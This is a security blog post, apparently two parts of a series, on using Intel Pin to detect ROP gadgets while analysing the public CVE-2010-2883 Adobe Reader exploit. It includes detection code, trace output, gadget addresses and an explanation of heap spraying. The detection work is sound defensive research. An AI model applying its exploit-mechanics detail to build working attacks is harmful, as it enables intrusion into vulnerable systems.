<span style="font-family: Verdana, sans-serif; font-size: large;">Binary Instrumentation for Exploit Analysis Purposes (part 2)</span><br />
<span style="font-family: Verdana, sans-serif;">Posted by giulia, 2013-03-21.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Introduction.</u></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This is the second part of the <a href="http://scrammed.blogspot.com/2013/03/binary-instrumentation-for-exploit_10.html">article</a> about binary instrumentation for exploit analysis purposes, and this time we will discuss a real PDF exploit: a stack-based buffer overflow in CoolType.dll (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2883">CVE-2010-2883</a>). You can retrieve it from the Metasploit module </span><span style="font-family: Courier New, Courier, monospace;">exploit/windows/fileformat/adobe_cooltype_sing</span><span style="font-family: Verdana, sans-serif;">.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In order to bypass DEP, this exploit makes use of heap spraying to run its ROP shellcode. Our goal, on the other hand, is to get closer to the point where the vulnerability is triggered, so one clever thing to do is to use a Pintool to detect the ROP itself.</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">To do that, we can simply check whether the instruction executed after a RET is located right after a CALL, but be aware that performing this test alone can lead to false positives. A better test is to check whether this condition holds three times in a row, but this gives rise to some Pintool-related problems that we will discuss later.</span><br />
<span style="font-family: Verdana, sans-serif;">Another method to detect ROP is to inspect the ESP register and look for the "0c0c0c0c" value, but reading a register with Pin is very slow and degrades the performance of the Pintool, so we won't implement this one.</span><br />
<span style="font-family: Verdana, sans-serif;">Finally, one last check is to log the "pop ESP" instruction, which is a common ROP gadget employed right before the ROP shellcode itself.</span><br />
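<span style="font-family: Verdana, sans-serif;">As an added example (not part of the post or of its Pintool), the following C code implements the "RETurned here, but not after a CALL" check offline on a constructed byte buffer: instead of a fixed table of FF-opcode patterns it decodes the ModRM/SIB byte of FF /2, so every call r/m32 length is covered, and it applies the three-in-a-row rule and the pop ESP (0x5C) check described above. The call target 0x12345678 in the sample bytes is a placeholder.</span><br />

```c
#include <stdint.h>
#include <stddef.h>

/* Length of an x86-32 "FF /2" (call r/m32) instruction starting at p, or 0 if p
 * does not start one. No prefixes are handled: this is the set of forms the
 * post's OpcCheck table enumerates, derived from ModRM/SIB instead of listed. */
static size_t call_rm32_len(const uint8_t *p, size_t avail)
{
    if (avail < 2 || p[0] != 0xFF) return 0;
    uint8_t mod = p[1] >> 6, reg = (p[1] >> 3) & 7, rm = p[1] & 7;
    if (reg != 2) return 0;                         /* /2 selects CALL near indirect */
    size_t len = 2;
    if (mod == 3) return len;                       /* call reg */
    if (rm == 4) {                                  /* SIB byte follows */
        if (avail < 3) return 0;
        len++;
        if (mod == 0 && (p[2] & 7) == 5) len += 4;  /* SIB with no base: disp32 */
    } else if (mod == 0 && rm == 5) {
        len += 4;                                   /* call [disp32] */
    }
    if (mod == 1) len += 1;                         /* disp8 */
    if (mod == 2) len += 4;                         /* disp32 */
    return len <= avail ? len : 0;
}

/* Does some CALL end exactly at code[target]? E8 rel32 is matched by its opcode
 * byte alone, which can false-positive on data; that is why the streak rule exists. */
int preceded_by_call(const uint8_t *code, size_t code_len, size_t target)
{
    if (target > code_len) return 0;
    if (target >= 5 && code[target - 5] == 0xE8) return 1;
    for (size_t len = 2; len <= 7 && len <= target; len++) {
        size_t s = target - len;
        if (call_rm32_len(code + s, code_len - s) == len) return 1;
    }
    return 0;
}

/* The post's "pop ESP" check: opcode 5C at the executed address. */
int is_pop_esp(const uint8_t *code, size_t code_len, size_t off)
{
    return off < code_len && code[off] == 0x5C;
}

/* Streak refinement from the post: alert only after `threshold` consecutive
 * returns to an address that no call precedes. Returns the index into targets
 * at which the alert fires, or -1 if it never does. */
long ret_streak_alert(const uint8_t *code, size_t code_len,
                      const size_t *targets, size_t n, int threshold)
{
    int streak = 0;
    for (size_t k = 0; k < n; k++) {
        streak = preceded_by_call(code, code_len, targets[k]) ? 0 : streak + 1;
        if (streak >= threshold) return (long)k;
    }
    return -1;
}

/* Constructed sample: three genuine call sites and two gadgets. */
const uint8_t sample_code[] = {
    0xE8, 0x00, 0x00, 0x00, 0x00,       /* 00: call $+5           -> return site 05 */
    0x58,                               /* 05: pop eax                               */
    0xFF, 0x15, 0x78, 0x56, 0x34, 0x12, /* 06: call [0x12345678]  -> return site 12 */
    0xC3,                               /* 12: ret                                   */
    0xFF, 0x54, 0x24, 0x08,             /* 13: call [esp+8]       -> return site 17 */
    0x5C,                               /* 17: pop esp            (the gadget the post logs) */
    0xC3,                               /* 18: ret                                   */
    0x90, 0x90, 0xC3,                   /* 19: nop; nop; ret      (no call before it) */
};
const size_t sample_code_len = sizeof sample_code;

/* Return targets as a trace would report them: 19, 18 and 13 land on no call,
 * so with threshold 3 the alert fires at index 4. */
long demo_alert_index(void)
{
    const size_t targets[] = { 5, 12, 19, 18, 13 };
    return ret_streak_alert(sample_code, sample_code_len, targets, 5, 3);
}
```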
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Detecting the ROP with a Pintool.</u></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">Here is the function to detect the ROP:</span><br />
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter">#define LAST_EXECUTED 1000
ADDRINT LastExecutedBuf[LAST_EXECUTED];   // circular log of the last executed EIPs
UINT32 LastExecutedPos = 0;               // next free slot in LastExecutedBuf
UINT32 PreviousOpcode;                    // Pin opcode number of the previously executed instruction
char TempString[12];                      // scratch buffer for QuickDwordToString()

// Reads the two bytes located __dist bytes before the current EIP as a little-endian word
#define PREV_OPCODE(__dist) (((UINT16*)(AddrEip - __dist))[0])

// One CALL encoding to look for right before a RET target: Delta is the length of
// the CALL instruction, Opcode its first two bytes (little-endian, e.g. FF 15 -> 0x15ff)
typedef struct _OPC_CHECK
{
    UINT8 Delta;
    UINT16 Opcode;
} OPC_CHECK;

// Indirect CALL forms (FF /2) and their lengths; the direct CALL (E8 rel32, 5 bytes)
// is tested separately in DetectPopEsp(). The list ends with a zero-length entry.
OPC_CHECK OpcCheck[] =
{
    6, 0x15ff, 2, 0x12ff, 2, 0x11ff, 2, 0x13ff, 2, 0x17ff, 2, 0x16ff, 2, 0x10ff,
    3, 0x55ff, 3, 0x50ff, 3, 0x51ff, 3, 0x52ff, 3, 0x53ff, 4, 0x54ff, 3, 0x55ff,
    3, 0x56ff, 3, 0x57ff, 3, 0x59ff, 6, 0x95ff, 6, 0x97ff, 6, 0x76ff, 6, 0x96ff,
    6, 0x94ff, 6, 0x93ff, 6, 0x92ff, 6, 0x91ff, 6, 0x90ff, 7, 0x14ff, 7, 0x94ff,
    3, 0x14ff, 4, 0x54ff, 2, 0xd0ff, 2, 0xd1ff, 2, 0xd2ff, 2, 0xd3ff, 2, 0xd4ff,
    2, 0xd5ff, 2, 0xd6ff, 2, 0xd7ff, 0, 0
};

// Formats Value as 8 uppercase hex digits into String (cheaper than sprintf in a
// callback that runs for every single instruction)
char* QuickDwordToString(char *String, UINT32 Value)
{
    int i;
    UINT32 TempVal = Value;
    UINT8 TempByte;
    for(i = 0; i < 8; i++)
    {
        TempByte = (TempVal & 0xF) + 0x30;   // '0'..'9'
        if(TempByte > 0x39) TempByte += 7;   // 'A'..'F'
        String[7-i] = TempByte;
        TempVal >>= 4;
    }
    String[8] = 0;                           // terminate the string
    return String;
}

// Called before every instruction with its address and its Pin opcode number
VOID DetectPopEsp(ADDRINT AddrEip, UINT32 Opcode)
{
    UINT32 i, k;

    // Check 1: the previous instruction was a RET, so AddrEip is a return target.
    // A legitimate return target is preceded by a CALL; a ROP gadget normally is not.
    if(PreviousOpcode == 557 &&                // Pin opcode number for RET
       AddrEip < 0x70000000 &&                // ignore the range where the system DLLs are mapped
       ((UINT8*)(AddrEip-5))[0] != 0xE8)      // not preceded by a direct CALL (E8 rel32)
    {
        k = 0;
        while(OpcCheck[k].Delta != 0)
        {
            if( PREV_OPCODE(OpcCheck[k].Delta) == OpcCheck[k].Opcode)
                break;                         // preceded by an indirect CALL
            k++;
        }
        if(OpcCheck[k].Delta == 0)             // no CALL form matched
        {
            fprintf(OutTrace, "%s RETurned here, but not after call\n", QuickDwordToString(TempString, AddrEip));
        }
    }

    // Check 2: a POP; if it is POP ESP (opcode byte 5C), report it and dump the
    // circular buffer of recently executed EIPs, oldest entry first
    if(Opcode == 486)                          // Pin opcode number for POP
    {
        if(((UINT8*)AddrEip)[0] == 0x5C)
        {
            fprintf(OutTrace, "%s POP ESP DETECTED!!\n", QuickDwordToString(TempString, AddrEip));
            fprintf(OutTrace,"Dumping list of previously executed EIPs \n");
            // dump last executed buffer on file
            for(i = LastExecutedPos; i < LAST_EXECUTED; i++)
            {
                fprintf(OutTrace, "%s\n", QuickDwordToString(TempString, LastExecutedBuf[i]));
            }
            for(i = 0; i < LastExecutedPos; i++)
            {
                fprintf(OutTrace, "%s\n", QuickDwordToString(TempString, LastExecutedBuf[i]));
            }
            fprintf(OutTrace, "%s\n", QuickDwordToString(TempString, AddrEip));
            fflush(OutTrace);
        }
    }

    // Record this EIP in the circular buffer and remember its opcode for the next call
    LastExecutedBuf[LastExecutedPos] = AddrEip;
    LastExecutedPos++;
    if(LastExecutedPos >= LAST_EXECUTED)
    {
        // circular logging: wrap around
        LastExecutedPos = 0;
    }
    PreviousOpcode = Opcode;
}
</code></pre>
<br />
<span style="font-family: Verdana, sans-serif;">Include it in the source code of the basic Pintool provided in <a href="http://scrammed.blogspot.com/2013/03/binary-instrumentation-for-exploit_10.html">the first part of the article</a> and</span><span style="font-family: Verdana, sans-serif;"> use the following line:</span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span><br />
<span style="font-family: Courier New, Courier, monospace;">INS_InsertCall(Ins, IPOINT_BEFORE, (AFUNPTR)DetectEip, IARG_INST_PTR, IARG_UINT32, INS_Opcode(Ins), IARG_END);</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;">in the "Instruction()" function to call the "DetectEip()" function before every instruction is executed.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Also, add these lines:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<pre class="CICodeFormatter"><code class="CICodeFormatter">    // requires #include <stdarg.h> (or <cstdarg>) for va_list
    UINT32 Opcode;

    va_list VaList;
    va_start(VaList, AddrEip);

    // the second IARG passed by INS_InsertCall() is the Pin opcode number
    Opcode = va_arg(VaList, UINT32);

    va_end(VaList);

    DetectPopEsp(AddrEip, Opcode);
</code></pre>
<br />
<br />
<span style="font-family: Verdana, sans-serif;">in the "DetectEip()" function (where specified by the comments).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">Now a brief description of what the code does. Basically, this Pintool looks for two opcodes: the one corresponding to RET (Pin code 557) and the one corresponding to POP (Pin code 486).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">If a RET is encountered, the Pintool follows it and checks whether the instruction preceding the return target is a CALL, looking for the E8 opcode or for one of the encodings listed in the "OpcCheck[].Opcode" array (the list may not be complete, but it proved reasonably accurate during testing). If it is not, it notifies the user with the message: "*Address* RETurned here, but not after call".</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">If a POP is encountered, it checks whether it is a "POP ESP" and, if so, it notifies the user by printing "*Address* POP ESP DETECTED!!" and dumps the last executed instructions to the file.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">That's it. You are finally ready to compile the Pintool and run it within Adobe Acrobat Reader to analyse the PDF exploit.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Analyzing the output</u></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Here is an excerpt from the output produced by the Pintool:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Exception handler address: 7C91EAEC </span><br />
<span style="font-family: Courier New, Courier, monospace;">Starting Pintool</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading module C:\Programmi\Adobe\Reader 9.0\Reader\AcroRd32.exe </span><br />
<span style="font-family: Courier New, Courier, monospace;">Main exe Base: 00400000 End: 00453FFF</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading module C:\WINDOWS\system32\kernel32.dll </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module Base: 7C800000 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module end: 7C8FEFFF </span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading module C:\WINDOWS\system32\ntdll.dll </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module Base: 7C910000 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module end: 7C9C5FFF </span><br />
<span style="font-family: Courier New, Courier, monospace;">Starting thread 0</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">0D6D8192 RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">02D43FA5 RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">22326DB0 RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">5B18174F RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">08171CF0 RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">08171D47 RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">06066EED RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">0633DE6B RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">4A82A714 RETurned here, but not after call</span><br />
<span style="font-family: Courier New, Courier, monospace;">4A82A714 POP ESP DETECTED!!</span><br />
<span style="font-family: Courier New, Courier, monospace;">Dumping list of previously executed EIPs </span><br />
<span style="font-family: Courier New, Courier, monospace;">0803DDC6</span><br />
<span style="font-family: Courier New, Courier, monospace;">0803DDCA</span><br />
<span style="font-family: Courier New, Courier, monospace;">0803DDCC</span><br />
<span style="font-family: Courier New, Courier, monospace;">0803DDCD</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">0808B304</span><br />
<span style="font-family: Courier New, Courier, monospace;">0808B305</span><br />
<span style="font-family: Courier New, Courier, monospace;">0808B307</span><br />
<span style="font-family: Courier New, Courier, monospace;">0808B308</span><br />
<span style="font-family: Courier New, Courier, monospace;">4A80CB38</span><br />
<span style="font-family: Courier New, Courier, monospace;">4A80CB3E</span><br />
<span style="font-family: Courier New, Courier, monospace;">4A80CB3F</span><br />
<span style="font-family: Courier New, Courier, monospace;">4A82A714</span><br />
<br />
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">From the log above we can see all the modules being loaded and threads being created. Then, we notice some false positives: these are legitimate RETs, which don't return to an instruction after a CALL.</span><br />
<span style="font-family: Verdana, sans-serif;">Finally, we get to the part where both checks are detected: the code returns to an instruction not located after a call and a "POP ESP" instruction is executed.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In particular, the last logged EIPs correspond to the following ROP gadgets:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> 4A80CB38 81C5 94070000 ADD EBP,794</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 4A80CB3E C9 LEAVE</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 4A80CB3F C3 RETN</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> 4A82A714 5C POP ESP</span><br />
<span style="font-family: Courier New, Courier, monospace;">(4A82A715 C3 RETN)</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">So we have located where the exploit occurs (i.e. the address "0808B308</span><span style="font-family: 'Courier New', Courier, monospace;">")</span><span style="font-family: Verdana, sans-serif;">: not bad!</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Note that the last instruction reported here (the RETN </span><span style="font-family: Verdana, sans-serif;">between parentheses</span><span style="font-family: Verdana, sans-serif;">) is not logged by the Pintool because a crash happened right after its execution... but...</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><span style="font-size: large;"><u>...Why???</u></span></span><br />
<br />
<span style="font-family: Verdana, sans-serif;">As I said before, this exploit makes use of Heap Spraying. In particular, we can see it by debugging Adobe Acrobat Reader while Pin is not instrumenting it and setting a breakpoint on address "0808B308". Now, if we open the PDF exploit and leave the debugger running, we can inspect the memory when the code hits the breakpoint:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_GOaqzGm-88HkmEtQ5EEFW9Taq1I89FO1Oo4qviCy6irjv0a4CI61YbHUTut-52SGp_KVjo7lL7keb5WFIsCKDh36-lJu-4X-DgBod3kF1mCk9034XNuD8iUqhCfniyYUpz_LR7P4Q94/s1600/nopin_sc1-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_GOaqzGm-88HkmEtQ5EEFW9Taq1I89FO1Oo4qviCy6irjv0a4CI61YbHUTut-52SGp_KVjo7lL7keb5WFIsCKDh36-lJu-4X-DgBod3kF1mCk9034XNuD8iUqhCfniyYUpz_LR7P4Q94/s1600/nopin_sc1-1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwkzOXn5rqJMXph9sYjqMZchrluBIBKw6_fz1Us0dAYAs2mXS9pVYh8NrnzSJKbvK4y76DI0NhFvBTAa6S1EIVspGN1rylFSURS96T1BlGu0MnzYisOPBiDFWzLTk2-CfXOtrUM9_BokE/s1600/nopin_area-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwkzOXn5rqJMXph9sYjqMZchrluBIBKw6_fz1Us0dAYAs2mXS9pVYh8NrnzSJKbvK4y76DI0NhFvBTAa6S1EIVspGN1rylFSURS96T1BlGu0MnzYisOPBiDFWzLTk2-CfXOtrUM9_BokE/s1600/nopin_area-1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">This is exactly what we were expecting: you can notice the ROP shellcode at "0c0c0c0c" and the Heap Spraying all around. On the other hand, if we debug the Adobe Acrobat Reader while Pin is instrumenting it, we obtain:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh03BPCL-_N37ibjB8WkhInJV4SH2FnbZk20bOrU5xD5ePBFoGbIqy7ESSyrTrokT1w0x_6HEknuIL0FAyExQjWrzFaGg9uyTvFu53XJ5VDU6eCxWqyWVlkAvBtLRd_geVSNzEYYaNw1Qk/s1600/pin_nosc-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh03BPCL-_N37ibjB8WkhInJV4SH2FnbZk20bOrU5xD5ePBFoGbIqy7ESSyrTrokT1w0x_6HEknuIL0FAyExQjWrzFaGg9uyTvFu53XJ5VDU6eCxWqyWVlkAvBtLRd_geVSNzEYYaNw1Qk/s1600/pin_nosc-1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx4rqYXobn_SzT2lCAUkSUA0lcRsBt0yYgjP4sCjJQrYMUQnJB21eqhYl86VsyQcy_ev8aGKAZ2zemzuHta9Dh7iGrl-kQqON-pXkpIe8K0b0JDg0u6-75PH_UUmujrD1ejxLRIAYkW8k/s1600/pin_area-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx4rqYXobn_SzT2lCAUkSUA0lcRsBt0yYgjP4sCjJQrYMUQnJB21eqhYl86VsyQcy_ev8aGKAZ2zemzuHta9Dh7iGrl-kQqON-pXkpIe8K0b0JDg0u6-75PH_UUmujrD1ejxLRIAYkW8k/s1600/pin_area-1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">So... no ROP, nor Heap Spraying... but the blocks of memory are still allocated. Who has allocated them?</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">To get the answer we need to look inside the code window:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitaIWlwSzeqt644DjW3MpBxtNOt5kMyouGbi2AEwpkHi3T2AA-c3HNeKb6Izke9hgaFx-Uh1DC7ynsYdOSZmD-9fHA7daFHvJZjjiMv4ofx-2qlgkxME_i4pqGQnDd3CyvbYN8yL-W7Lw/s1600/pin_code.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitaIWlwSzeqt644DjW3MpBxtNOt5kMyouGbi2AEwpkHi3T2AA-c3HNeKb6Izke9hgaFx-Uh1DC7ynsYdOSZmD-9fHA7daFHvJZjjiMv4ofx-2qlgkxME_i4pqGQnDd3CyvbYN8yL-W7Lw/s1600/pin_code.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">... It's Pin itself!</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">Pin allocates a lot of memory to perform binary instrumentation, also occupying the addresses usually taken by the Heap Spraying. This means that when the ROP shellcode is executed, it is not located where it is supposed to be, and this results in Adobe Acrobat Reader crashing.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Verdana, sans-serif;">Another problem I ran into is that even when I modified the Pintool in order to force the exploit to work with the shellcode that was placed at a different address than 0x0C0C0C0C, the exploit still crashed.</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Verdana, sans-serif;">This time I could see it run all the ROP shellcode, which allocates a block of executable memory, copies itself to it and then jumps to it.</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Verdana, sans-serif;">However, this executable shellcode (not ROP) tried to decrypt (and therefore overwrite) itself causing</span><span style="font-family: Verdana, sans-serif;"> a memory access violation and making the instrumented shellcode crash. </span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Verdana, sans-serif;">I haven't investigated the problem yet, but it seems that the instrumented shellcode is placed in an area that is read only, therefore the self decryption failed when writing the decrypted bytes back to the shellcode memory. </span></div>
<br />
<span style="font-family: Verdana, sans-serif;">Posted by giulia, 2013-03-10</span><br />
<span style="font-family: Verdana, sans-serif; font-size: large;">Binary Instrumentation for Exploit Analysis Purposes (part 1)</span><br />
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Introduction.</u></span><br />
<br />
<span style="font-family: Verdana, sans-serif;">This article is about binary instrumentation over various exploit scenarios. In particular, we are going to use <a href="http://software.intel.com/en-us/articles/pin-a-dynamic-binary-instrumentation-tool">Pin</a>, a software developed by Intel, to show how this approach can help with the analysis.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Pin is employed to create dynamic program analysis tools, the so-called "Pintools". Once executed, a Pintool acts almost like a virtual machine that runs the code of a target executable image and rebuilds it, adding the code you need to perform your own analysis. For example, you can: install a callback that is invoked every time a single instruction is executed; inspect registers; alter the context; and so on.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><u>Note</u>: I've tested the whole work using Windows XP 32 bit and Visual Studio 2010.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /><span style="font-size: large;"><u>How to compile and execute a Pintool.</u></span></span><br />
<span style="font-family: Verdana, sans-serif;"><u><br /></u></span>
<span style="font-family: Verdana, sans-serif;">The simplest way to compile a Pintool is to use the Visual Studio project provided by Intel, located in the Pin folder at: \source\tools\MyPinTool .</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">To run it, simply type: </span><span style="font-family: 'Courier New', Courier, monospace;">pin -t <your_pintool.dll> -- <application_path>.</span><br />
<span style="font-family: Verdana, sans-serif;">In this way your Pintool will be executed within the application you want to test.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>How to code a Pintool: a (very) short description.</u></span></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">A Pintool begins with a standard initialization of the Pin engine by using the "PIN_Init()" function; then, you need to register the callbacks for the events you want to handle. </span><br />
<span style="font-family: Verdana, sans-serif;">For instance, you can use:</span><br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">"INS_AddInstrumentFunction()" to register a callback that is invoked at every executed instruction;</span></li>
<li><span style="font-family: Verdana, sans-serif;">"IMG_AddInstrumentFunction()" to register a callback that notifies you every time an executable module is loaded;</span></li>
<li><span style="font-family: Verdana, sans-serif;">"PIN_AddThreadStartFunction()" and "</span><span style="font-family: Verdana, sans-serif;">PIN_AddThreadFiniFunction()"</span><span style="font-family: Verdana, sans-serif;"> to </span><span style="font-family: Verdana, sans-serif;">handle thread creation and ending.</span></li>
</ul>
<br />
<span style="font-family: Verdana, sans-serif;">In particular, if you register a callback with </span><span style="font-family: Verdana, sans-serif;">"INS_AddInstrumentFunction()"</span><span style="font-family: Verdana, sans-serif;">, you can then use the "INS_InsertCall()" function from it and register other callbacks.</span><br />
<span style="font-family: Verdana, sans-serif;">These callbacks have a special property: they can be invoked before or after an instruction is executed. </span><span style="font-family: Verdana, sans-serif;">Also, you can pass to them any kind of data, including the value of specific registers (the instruction pointer, for instance), memory addresses and so on.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Finally, you'll have to use "PIN_AddFiniFunction()" to register the callback that is invoked when the application quits.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Once all the callbacks are registered, you can start the instrumented program by calling "PIN_StartProgram()".</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Your Pintool can filter specific conditions with an incredibly fine resolution, but bear in mind that performance may degrade badly depending on what kind of actions you choose to perform.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">As an example, let's consider again </span><span style="font-family: Verdana, sans-serif;">"INS_AddInstrumentFunction()"</span><span style="font-family: Verdana, sans-serif;">, and suppose that we are going to register a callback that logs every executed instruction to a file: if you are not careful, you might perform a file I/O operation for every single instruction, which is very inefficient. Another operation that will reduce your Pintool's performance, if called frequently, is the disassembler functionality.</span><br />
<span style="font-family: Verdana, sans-serif;">So be careful: your instrumented application can run at almost real-time speed if your Pintool is well written, but a bad implementation may slow down your application to the point where it takes minutes to run.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>A basic Pintool.</u></span><br />
<br />
<span style="font-family: Verdana, sans-serif;">Here is a very basic Pintool to which we will add more specific functions later.</span><br />
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter">#include <stdio.h>
#include "pin.H"
// Keep the Windows API in its own namespace so its definitions don't clash with Pin's
namespace WINDOWS
{
#include <windows.h>
}

FILE * OutTrace;                  // trace file
